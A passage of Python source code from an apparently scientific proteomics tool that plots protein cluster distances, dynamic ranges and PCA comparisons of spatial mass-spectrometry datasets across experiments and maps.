abundance_profiles_and_median_figure = abundance_profiles_figure.add_scatter(x=df_setofproteins_median["Fraction"],
y=df_setofproteins_median["normalized profile"],
name="Median profile"
)
# dash lines for proteins that have insufficient coverage across maps
abundance_profiles_and_median_figure.for_each_trace(lambda x: x.update(line={"dash":"dash"}),
selector=lambda x: x.name in self.genenames_sortedout_list)
return abundance_profiles_and_median_figure
except:
return "This protein cluster was not quantified"
def quantification_overview(self, cluster_of_interest="Proteasome"):
"""
Args:
self.df_allclusters_clusterdist_fracunstacked_unfiltered
columns: 01K, 03K, 06K, 12K, 24K, 80K
index: Gene names, Protein IDs, C-Score, Q-value, Map, Compartment, Cluster
Returns:
df
"""
df_quantification_overview = self.df_allclusters_clusterdist_fracunstacked_unfiltered.xs(cluster_of_interest, level="Cluster", axis=0)\
[self.fractions[0]].unstack("Map")
if "Sequence" in df_quantification_overview.index.names:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i in ["Sequence","Gene names"]])
else:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i=="Gene names"])
df_quantification_overview = df_quantification_overview.notnull().replace({True: "x", False: "-"})
return df_quantification_overview
def distance_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, and across all maps is generated displaying the distribution of the e.g.
Manhattan distance.
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
map_names = self.map_names
df_distance_noindex = self.df_distance_noindex
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
if "Sequence" in df_distance_map_cluster_gene_in_index.columns:
df_distance_map_cluster_gene_in_index.set_index("Sequence", append=True, inplace=True)
df_cluster_xmaps_distance_with_index = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_map_cluster_gene_in_index" and appended to the new dataframe df_cluster_xmaps_distance_with_index
for maps in map_names:
plot_try = df_distance_map_cluster_gene_in_index.xs((cluster_of_interest, maps),
level=["Cluster", "Map"], drop_level=False)
df_cluster_xmaps_distance_with_index = df_cluster_xmaps_distance_with_index.append(plot_try)
df_cluster_xmaps_distance_with_index["Combined Maps"] = "Combined Maps"
#number of proteins within one cluster
self.proteins_quantified_across_all_maps = df_cluster_xmaps_distance_with_index.unstack("Map").shape[0]
# index will be reset, required by px.box
df_cluster_xmaps_distance = df_cluster_xmaps_distance_with_index.reset_index()
distance_boxplot_figure = go.Figure()
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Map"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Combined Maps"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.update_layout(
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest),
autosize=False,
showlegend=False,
width=500,
height=500,
# black box around the graph
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
except:
self.cache_cluster_quantified = False
def distance_to_median_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, across all maps and fractions is generated displaying the
distribution of the distance to the median. For each fraction, one box plot will be displayed.
Args:
self:
df_allclusters_clusterdist_fracunstacked, dataframe with single level column, stored as attribute
(self.allclusters_clusterdist_fracunstacked), in which "Fraction" is unstacked. It contains only the
normalized data of individual protein clusters substracted by the median of the respective protein cluster
for each fraction.
map_names: individual map names are stored as an index
Returns:
distance_to_median_boxplot_figure: Box plot. Along the x-axis, the maps are shown, along the y-axis
the distances is plotted
"""
df_boxplot_manymaps = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_allclusters_clusterdist_fracunstacked" and appended to the new dataframe df_boxplot_manymaps
for maps in self.map_names:
plot_try = self.df_allclusters_clusterdist_fracunstacked.xs((cluster_of_interest, maps), level=["Cluster", "Map"], drop_level=False)
df_boxplot_manymaps = df_boxplot_manymaps.append(plot_try)
self.df_boxplot_manymaps = df_boxplot_manymaps
# index will be reset, required by px.violin
df_boxplot_manymaps = abs(df_boxplot_manymaps.stack("Fraction"))
df_boxplot_manymaps.name = "distance"
df_boxplot_manymaps = df_boxplot_manymaps.reindex(index=natsort.natsorted(df_boxplot_manymaps.index))
df_boxplot_manymaps = df_boxplot_manymaps.reset_index()
# box plot will be generated, every fraction will be displayed in a single plot
distance_to_median_boxplot_figure = px.box(df_boxplot_manymaps,
x="Map",
y="distance",
facet_col="Fraction",
facet_col_wrap=2,
boxmode="overlay", height=900, width=700, points="all",
hover_name="Gene names",
template="simple_white",
title="Distribution of the distance to the median for <br>the protein cluster: {}".format(cluster_of_interest))
return distance_to_median_boxplot_figure
except:
return "This protein cluster was not quantified"
def dynamic_range(self):
"""
Dynamic range of each individual protein clusters (of the median profile) across all maps is calculated"
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
fig_dynamicRange: Bar plot, displaying the dynamic range for each protein cluster
self.df_dynamicRange: df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
df_setofproteins_allMaps = pd.DataFrame()
df_dynamicRange = pd.DataFrame()
df_01_stacked = self.df_01_stacked
for clusters in self.markerproteins:
try:
df_setofproteins_allMaps = pd.DataFrame()
for marker in self.markerproteins[clusters]:
try:
df_marker_allMaps = df_01_stacked.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_setofproteins_allMaps = df_setofproteins_allMaps.append(df_marker_allMaps)
df_setofproteins_allMaps_median = df_setofproteins_allMaps["normalized profile"].unstack("Fraction").median()
df_dynamicRange = df_dynamicRange.append(pd.DataFrame(np.array([[max(df_setofproteins_allMaps_median),
min(df_setofproteins_allMaps_median),
max(df_setofproteins_allMaps_median)-min(df_setofproteins_allMaps_median),
clusters]]),
columns=["Max", "Min", "Dynamic Range", "Cluster"]),
ignore_index=True)
except:
continue
self.analysis_summary_dict["Dynamic Range"] = df_dynamicRange.to_json()
def plot_dynamic_range(self):
"""
Dynamic range of each individual protein clusters (of the median profile) across all maps is displayed"
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
fig_dynamicRange: Bar plot, displaying the dynamic range for each protein cluster
self.df_dynamicRange: df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
fig_dynamicRange = px.bar(pd.read_json(self.analysis_summary_dict["Dynamic Range"]),
x="Cluster",
y="Dynamic Range",
base="Min",
template="simple_white",
width=1000,
height=500).update_xaxes(categoryorder="total ascending")
return fig_dynamicRange
def results_overview_table(self):
"""
Dataframe will be created, that provides information about "range", "mean" and "standardeviation",
given as the column names, based on the data given in df_distance_noindex
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset. It contains the column name "distance",
in which the e.g. Manhattan distances for each individual protein of the specified clusters (see self.markerproteins)
are stored
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
"""
df_distance_noindex = self.df_distance_noindex
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
map_names = self.map_names
df_overview = pd.DataFrame()
for clusters in self.markerproteins:
#if a certain cluster is not available in the dataset at all
try:
for maps in map_names:
df_dist_map_cluster = df_distance_map_cluster_gene_in_index.xs((clusters, maps), level=["Cluster", "Map"], drop_level=False)
statistic_table = {"range": (df_dist_map_cluster["distance"].max(axis=0)) - (df_dist_map_cluster["distance"].min(axis=0)),
"median": df_dist_map_cluster["distance"].median(axis=0),
"standardeviation": df_dist_map_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": maps
}
statistic_series = pd.Series(data=statistic_table)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
df_dist_cluster = df_distance_map_cluster_gene_in_index.xs(clusters, level="Cluster")
statistic_table_combined = {
"range": (df_dist_cluster["distance"].max(axis=0)) - (df_dist_cluster["distance"].min(axis=0)),
"median": df_dist_cluster["distance"].median(axis=0),
"standardeviation": df_dist_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": "combined maps"
}
statistic_series_combined = pd.Series(data=statistic_table_combined)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series_combined).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
except:
continue
try:
df_overview.set_index(["Cluster", "Map"], inplace=True)
df_overview.sort_index(axis=0, level=0, inplace=True)
except:
df_overview = pd.DataFrame()
self.analysis_summary_dict["Overview table"] = df_overview.reset_index().to_json()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#self.analysis_summary_dict.clear()
return df_overview
def reframe_df_01ORlog_for_Perseus(self, df_01ORlog):
""""
To be available for Perseus df_01_stacked needs to be reframed.
Args:
df_01ORlog:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
df_01ORlog_svm:
LFQ:
columns: "MS/MS count_Map1_01K", "normalized profile_Map1_01K"
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Compartment"
SILAC:
columns: e.g. "Ratio H/L count_MAP2_80K", "Ratio H/L variability [%]_MAP1_03K", "normalized profile_MAP5_03K"
index: "Q-value", "Score", "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "id", "Compartment"
"""
df_01ORlog_svm = df_01ORlog.copy()
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01ORlog_svm.index.get_level_values("Map")+"_"+df_01ORlog_svm.index.get_level_values("Fraction")
index_ExpMap.name = "Map_Frac"
df_01ORlog_svm.set_index(index_ExpMap, append=True, inplace=True)
df_01ORlog_svm.index = df_01ORlog_svm.index.droplevel(["Map", "Fraction"])
df_01ORlog_svm = df_01ORlog_svm.unstack("Map_Frac")
#df_01ORlog_svm = df_01ORlog_svm.dropna(axis=0, subset=df_01ORlog_svm.loc[[], ["normalized profile"]].columns)
df_01ORlog_svm.columns = ["_".join(col) for col in df_01ORlog_svm.columns.values]
df_01ORlog_svm.rename(index={"undefined" : np.nan}, level="Compartment", inplace=True)
return df_01ORlog_svm
class SpatialDataSetComparison:
analysed_datasets_dict = SpatialDataSet.analysed_datasets_dict
css_color = SpatialDataSet.css_color
cache_stored_SVM = True
def __init__(self, ref_exp="Exp2", **kwargs): #clusters_for_ranking=["Proteasome", "Lysosome"]
#self.clusters_for_ranking = clusters_for_ranking
self.ref_exp = ref_exp
self.json_dict = {}
#self.fractions, self.map_names = [], [] #self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
#collapse_maps,collapse_cluster, cluster_of_interest_comparison, multi_choice, multi_choice_venn, x_PCA_comp, y_PCA_comp
#if "organism" not in kwargs.keys():
# self.markerproteins = self.markerproteins_set["Human - Swissprot"]
#else:
# assert kwargs["organism"] in self.markerproteins_set.keys()
# self.markerproteins = self.markerproteins_set[kwargs["organism"]]
# del kwargs["organism"]
#self.unique_proteins_total = unique_proteins_total
self.exp_names, self.exp_map_names = [], []
self.df_01_filtered_combined, self.df_distance_comp = pd.DataFrame(), pd.DataFrame()
self.df_quantity_pr_pg_combined, self.df_dynamicRange_combined = pd.DataFrame(), pd.DataFrame()
def read_jsonFile(self): #, content=None
"""
Read-out of the JSON-file and currently analysed dataset, stored in "analysed_datasets_dict". It wil create df_distances_combined ("Gene
names", "Cluster" are stacked; "Map" and Experiment names (are not stored in an additional level name) are unstacked. Layout will be
adjusted for distance-plotting.
Args:
self.json_dict: contains the dictionary stored in AnalysedDatasets.json
{"Experiment name" : {
"changes in shape after filtering" : {
##SILAC##
"Original size" : tuple,
"Shape after categorical filtering" : tuple,
"Shape after Ratio H/L count (>= 3)/var (count>=2, var<30) filtering" : tuple,
"Shape after filtering for complete profiles" : tuple,
##LFQ/spectronaut##
"Original size" : tuple,
"Shape after MS/MS value filtering" : tuple,
"Shape after consecutive value filtering" : tuple,
},
"quantity: profiles/protein groups" : df - number of protein groups | number of profiles | data completeness of profiles
"Unique Proteins": list,
"Analysis parameters" : {
"acquisition" : str,
"filename" : str,
##SILAC##
"Ratio H/L count 1 (>= X)" : int,
"Ratio H/L count 2 (>=Y, var<Z)" : int,
"Ratio variability (<Z, count>=Y)" : int,
##LFQ/spectronaut##
"consecutive data points" : int,
"summed MS/MS counts" : int,
},
"0/1 normalized data - mean" : df - mean of all datapoints,
"0/1 normalized data" : df - individual cluster,
"Distances to the median profile" : df - individual cluster,
"Manhattan distances" : df - individual cluster,
"Dynamic Range": df - individual cluster,
"Overview table" : df - individual cluster,
##if user perform the Misclassification Analysis befor downloading the dictionary AnalysedDatasets.json##
{"Misclassification Analysis": {
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {
"Total - Recall": int,
"Membrane - Recall" : int,
"Av per organelle - Recall": int,
"Median per organelle - Recall" : int,
"Av precision organelles" : int,
"Av F1 organelles" : int,
"Av F1 all clusters" : int,
}
}
}
}
Returns:
self:
df_01_filtered_combined: df, "Fraction" is unstacked; "Experiment", "Gene names", "Map", "Exp_Map" are stacked
df_distance_comp: df, no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map", "Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
exp_map_names: list of unique Exp_Map - fusions e.g. LFQ_Map1
exp_names: list of unique Experiment names - e.g. LFQ
"""
json_dict = self.json_dict
#add experiments that are not stored in AnalysedDAtasets.json for comparison
#try:
#if len(SpatialDataSet.analysed_datasets_dict.keys())>=1:
# json_dict.update(SpatialDataSet.analysed_datasets_dict)
##except:
#else:
# pass
self.analysis_parameters_total = {}
unique_proteins_total = {}
df_01_combined = pd.DataFrame()
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data":
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"], inplace=True)
if "Sequence" in df_01_toadd.columns:
df_01_toadd.set_index(["Sequence"], inplace=True, append=True)
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], inplace=True)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_toadd.set_index(pd.Series(["?".join([str(i) for i in el]) for el in df_01_toadd.index.values], name="join"), append=True, inplace=True)
if len(df_01_combined) == 0:
df_01_combined = df_01_toadd.copy()
else:
df_01_combined = pd.concat([df_01_combined,df_01_toadd], sort=False, axis=1)
elif data_type == "quantity: profiles/protein groups" and exp_name == list(json_dict.keys())[0]:
df_quantity_pr_pg_combined = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_combined["Experiment"] = exp_name
elif data_type == "quantity: profiles/protein groups" and exp_name != list(json_dict.keys())[0]:
df_quantity_pr_pg_toadd = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_toadd["Experiment"] = exp_name
df_quantity_pr_pg_combined = pd.concat([df_quantity_pr_pg_combined, df_quantity_pr_pg_toadd])
elif data_type == "Manhattan distances" and exp_name == list(json_dict.keys())[0]:
df_distances_combined = pd.read_json(json_dict[exp_name][data_type])
df_distances_combined = df_distances_combined.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_combined.columns:
df_distances_combined.set_index(["Sequence"], inplace=True, append=True)
df_distances_combined = df_distances_combined[["distance"]].unstack(["Map"])
df_distances_combined.rename(columns = {"distance":exp_name}, inplace=True)
elif data_type == "Manhattan distances" and exp_name != list(json_dict.keys())[0]:
df_distances_toadd = pd.read_json(json_dict[exp_name][data_type])
df_distances_toadd = df_distances_toadd.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_toadd.columns:
df_distances_toadd.set_index(["Sequence"], inplace=True, append=True)
df_distances_toadd = df_distances_toadd[["distance"]].unstack(["Map"])
df_distances_toadd.rename(columns = {"distance":exp_name}, inplace=True)
df_distances_combined = pd.concat([df_distances_combined, df_distances_toadd], axis=1)#, join="inner")
elif data_type == "Dynamic Range" and exp_name == list(json_dict.keys())[0]:
df_dynamicRange_combined = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_combined["Experiment"] = exp_name
elif data_type == "Dynamic Range" and exp_name != list(json_dict.keys())[0]:
df_dynamicRange_toadd = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_toadd["Experiment"] = exp_name
df_dynamicRange_combined = pd.concat([df_dynamicRange_combined, df_dynamicRange_toadd])
# if data_type == "Overview table" and exp_name == list(json_dict.keys())[0]:
# #convert into dataframe
# df_distanceOverview_combined = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_combined["Experiment"] = exp_name
# df_distanceOverview_combined = df_distanceOverview_combined.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
#
# elif data_type == "Overview table" and exp_name != list(json_dict.keys())[0]:
# df_distanceOverview_toadd = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_toadd["Experiment"] = exp_name
# df_distanceOverview_toadd = df_distanceOverview_toadd.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
# #dataframes will be concatenated, only proteins/Profiles that are in both df will be retained
# df_distanceOverview_combined = pd.concat([df_distanceOverview_combined, df_distanceOverview_toadd])
elif data_type == "Unique Proteins":
unique_proteins_total[exp_name] = json_dict[exp_name][data_type]
elif data_type == "Analysis parameters":
self.analysis_parameters_total[exp_name] = json_dict[exp_name][data_type]
#try:
# for paramters in json_dict[exp_name][data_type].keys():
# if paramters=="acquisition":
# acquisition_loaded.append(json_dict[exp_name][data_type][paramters])
# #elif parameters=="Non valid profiles":
#except:
# continue
#
df_01_combined = df_01_combined.droplevel("join", axis=0)
#filter for consistently quantified proteins (they have to be in all fractions and all maps)
#df_01_filtered_combined = df_01_mean_combined.dropna()
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
#reframe it to make it ready for PCA
df_01_filtered_combined = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
#df_01_filtered_combined = df_01_combined.stack(["Experiment"]).dropna(axis=1)
df_01_filtered_combined = df_01_filtered_combined.div(df_01_filtered_combined.sum(axis=1), axis=0)
#df_01_filtered_combined = df_01_combined.copy()
#df_01_filtered_combined.columns.names = ["Experiment", "Fraction", "Map"]
## Replace protein IDs by the unifying protein ID across experiments
#comparison_IDs = pd.Series([split_ids_uniprot(el) for el in df_01_filtered_combined.index.get_level_values("Protein IDs")],
# name="Protein IDs")
#df_01_filtered_combined.index = df_01_filtered_combined.index.droplevel("Protein IDs")
#df_01_filtered_combined.set_index(comparison_IDs, append=True, inplace=True)
##reframe it to make it ready for PCA | dropna: to make sure, that you do consider only fractions that are in all experiments
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01_filtered_combined.index.get_level_values("Experiment")+"_"+df_01_filtered_combined.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df_01_filtered_combined.set_index(index_ExpMap, append=True, inplace=True)
df_distances_combined.columns.names = ["Experiment", "Map"]
series = df_distances_combined.stack(["Experiment", "Map"])
series.name = "distance"
df_distance_comp = series.to_frame()
#fuse Experiment and Map into one column = "Exp_Map"
index_dist_ExpMap = df_distance_comp.index.get_level_values("Experiment")+"_"+df_distance_comp.index.get_level_values("Map")
index_dist_ExpMap.name = "Exp_Map"
df_distance_comp.set_index(index_dist_ExpMap, append=True, inplace=True)
#new
#self.df_distance_comp2 = df_distance_comp.copy()
df_distance_comp.reset_index(level=['Protein IDs'], inplace=True)
df_distance_comp["Protein IDs"] = df_distance_comp["Protein IDs"].str.split(";", expand=True)[0]
df_distance_comp = df_distance_comp.set_index("Protein IDs", append=True).unstack(["Experiment", "Exp_Map", "Map"]).dropna().stack(["Experiment", "Exp_Map", "Map"]).reset_index()
#df_distance_comp.reset_index(inplace=True)
self.unique_proteins_total = unique_proteins_total
self.exp_names = list(df_01_filtered_combined.index.get_level_values("Experiment").unique())
self.exp_map_names = list(index_dist_ExpMap.unique())
self.df_01_filtered_combined = df_01_filtered_combined
#self.df_01_mean_filtered_combined = df_01_mean_filtered_combined
self.df_quantity_pr_pg_combined = df_quantity_pr_pg_combined
self.df_dynamicRange_combined = df_dynamicRange_combined
self.df_distance_comp = df_distance_comp
try:
organism = json_dict[list(json_dict.keys())[0]]["Analysis parameters"]['organism']
except:
organism = "Homo sapiens - Uniprot"
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(organism)))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.clusters_for_ranking = self.markerproteins.keys()
def perform_pca_comparison(self):
"""
PCA will be performed, using logarithmized data.
Args:
self:
df_01_filtered_combined: df, which contains 0/1 normalized data for each map - for all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Protein IDs", "Gene names", "Compartment", "Experiment", "Map", "Exp_Map"
df_01_mean_filtered_combined: df, which contains (global) 0/1 normalized data across all maps (mean) - for all experiments and for all protein IDs,
that are consistent throughout all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Gene names", "Protein IDs", "Compartment", "Experiment"
Returns:
self:
df_pca_for_plotting: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
"""
markerproteins = self.markerproteins.copy()
#df_01_filtered_combined = self.df_01_filtered_combined
#df_01_filtered_combined = self.df_01_filtered_combined
df_mean = pd.DataFrame()
for exp in self.exp_names:
df_exp = self.df_01_filtered_combined.stack("Fraction").unstack(["Experiment", "Map","Exp_Map"])[exp].mean(axis=1).to_frame(name=exp)
df_mean = pd.concat([df_mean, df_exp], axis=1)
df_mean = df_mean.rename_axis("Experiment", axis="columns").stack("Experiment").unstack("Fraction")
pca = PCA(n_components=3)
df_pca = pd.DataFrame(pca.fit_transform(df_mean))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_mean.index
try:
markerproteins["PSMA subunits"] = [item for sublist in [re.findall("PSMA.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
markerproteins["PSMB subunits"] = [item for sublist in [re.findall("PSMB.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
del markerproteins["Proteasome"]
except:
pass
###only one df, make annotation at that time
df_cluster = pd.DataFrame([(k, i) for k, l in markerproteins.items() for i in l], columns=["Cluster", "Gene names"])
df_global_pca = df_pca.reset_index().merge(df_cluster, how="left", on="Gene names")
df_global_pca.Cluster.replace(np.NaN, "Undefined", inplace=True)
self.markerproteins_splitProteasome = markerproteins
self.df_pca = df_pca
self.df_global_pca = df_global_pca
def plot_pca_comparison(self, cluster_of_interest_comparison="Proteasome", multi_choice=["Exp1", "Exp2"]):
"""
A PCA plot for desired experiments (multi_choice) and 1 desired cluster is generated.
Either the maps for every single experiment are displayed individually or in a combined manner
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
multi_choice: list of experiment names
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
df_pca: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
Returns:
pca_figure: PCA plot for a specified protein cluster.
"""
df_pca = self.df_pca.copy()
markerproteins = self.markerproteins
try:
df_setofproteins_PCA = pd.DataFrame()
for map_or_exp in multi_choice:
for marker in markerproteins[cluster_of_interest_comparison]:
try:
plot_try_pca = df_pca.xs((marker, map_or_exp), level=["Gene names", "Experiment"], drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
df_setofproteins_PCA = df_setofproteins_PCA.assign(Experiment_lexicographic_sort=pd.Categorical(df_setofproteins_PCA["Experiment"], categories=multi_choice,
ordered=True))
df_setofproteins_PCA.sort_values("Experiment_lexicographic_sort", inplace=True)
pca_figure = px.scatter_3d(df_setofproteins_PCA,
x="PC1",
y="PC2",
z="PC3",
color="Experiment",
template="simple_white",
hover_data=["Gene names"]
)
pca_figure.update_layout(autosize=False,
width=700,
height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
template="simple_white"
)
return pca_figure
except:
return "This protein cluster was not identified in all experiments"
def plot_global_pca_comparison(self, cluster_of_interest_comparison="Proteasome", x_PCA="PC1", y_PCA="PC3",
markerset_or_cluster=False, multi_choice=["Exp1", "Exp2"]):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
multi_choice: list of experiment names
css_color: list of colors
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
Returns:
pca_figure: global PCA plot, clusters based on the markerset based (df_organellarMarkerSet) are color coded.
"""
df_global_pca_exp = self.df_global_pca.loc[self.df_global_pca["Experiment"].isin(multi_choice)]
df_global_pca_exp.reset_index(inplace=True)
compartments = list(SpatialDataSet.df_organellarMarkerSet["Compartment"].unique())
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
compartments.insert(0, "undefined")
compartments.insert(len(compartments), "Selection")
cluster = self.markerproteins_splitProteasome.keys()
cluster_color = dict(zip(cluster, self.css_color))
cluster_color["Undefined"] = "lightgrey"
if markerset_or_cluster == True:
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster!="Undefined"].sort_values(by="Cluster")
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster=="Undefined"].append(df_global_pca)
else:
for i in self.markerproteins[cluster_of_interest_comparison]:
df_global_pca_exp.loc[df_global_pca_exp["Gene names"] == i, "Compartment"] = "Selection"
df_global_pca = df_global_pca_exp.assign(Compartment_lexicographic_sort = pd.Categorical(df_global_pca_exp["Compartment"],
categories=[x for x in compartments],
ordered=True))
df_global_pca.sort_values(["Compartment_lexicographic_sort", "Experiment"], inplace=True)
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment" if markerset_or_cluster == False else "Cluster",
color_discrete_map=compartment_color if markerset_or_cluster == False else cluster_color,
title="Protein subcellular localization by PCA",
hover_data=["Protein IDs", "Gene names", "Compartment"],
facet_col="Experiment",
facet_col_wrap=2,
opacity=0.9,
template="simple_white"
)
fig_global_pca.update_layout(autosize=False,
width=1800 if markerset_or_cluster == False else 1600,
height=400*(int(len(multi_choice) / 2) + (len(multi_choice) % 2 > 0)),
template="simple_white"
)
return fig_global_pca
def get_marker_proteins(self, experiments, cluster):
df_in = self.df_01_filtered_combined.copy()
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster = df_cluster.append(df_p)
if len(df_cluster) == 0:
return df_cluster
# filter for all selected experiments
df_cluster = df_cluster.droplevel("Exp_Map", axis=0)
df_cluster = df_cluster.unstack(["Experiment", "Map"])
if any([el not in df_cluster.columns.get_level_values("Experiment") for el in experiments]):
return pd.DataFrame()
drop_experiments = [el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments]
if len(drop_experiments) > 0:
df_cluster.drop([el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments],
level="Experiment", axis=1, inplace=True)
df_cluster.dropna(inplace=True)
